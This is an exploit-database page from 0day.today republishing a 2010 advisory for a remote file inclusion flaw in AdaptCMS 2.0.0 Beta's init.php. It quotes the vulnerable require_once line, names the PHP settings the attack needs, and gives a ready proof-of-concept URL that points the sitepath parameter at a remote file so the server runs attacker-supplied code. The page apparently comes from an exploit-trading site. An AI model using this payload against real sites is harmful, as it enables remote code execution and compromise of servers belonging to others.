[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

AdaptCMS 2.0.0 Beta (init.php) Remote File Inclusion Vulnerability

Author
v3n0m
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12913
Category
web applications
Date add
24-06-2010
Platform
php
==================================================================
AdaptCMS 2.0.0 Beta (init.php) Remote File Inclusion Vulnerability
==================================================================


Author      : v3n0m
Site        : http://yogyacarderlink.web.id/
Date        : June, 24-2010
Location    : Jakarta, Indonesia
Time Zone   : GMT +7:00
----------------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application : AdaptCMS
Vendor      : http://www.adaptcms.com/
License     : Free
Download    : http://sourceforge.net/projects/adaptcms/files/
----------------------------------------------------------------
 
- register_globals = on
- allow_url_include = on
 
Vuln Code:
~~~~~~~
 
[-] /init.php
 
    require_once($sitepath.'inc/smarty/libs/Smarty.class.php');  // line 10
 
Poc:
~~~~~~~
 
http://127.0.0.1/[path]/inc/smarty/libs/init.php?sitepath=http://localhost/jovita.txt??
 
----------------------------------------------------------------
 
WWW.YOGYACARDERLINK.WEB.ID | v3n0m666[at]live[dot]com
 
---------------------------[EOF]--------------------------------



#  0day.today [2024-11-15]  #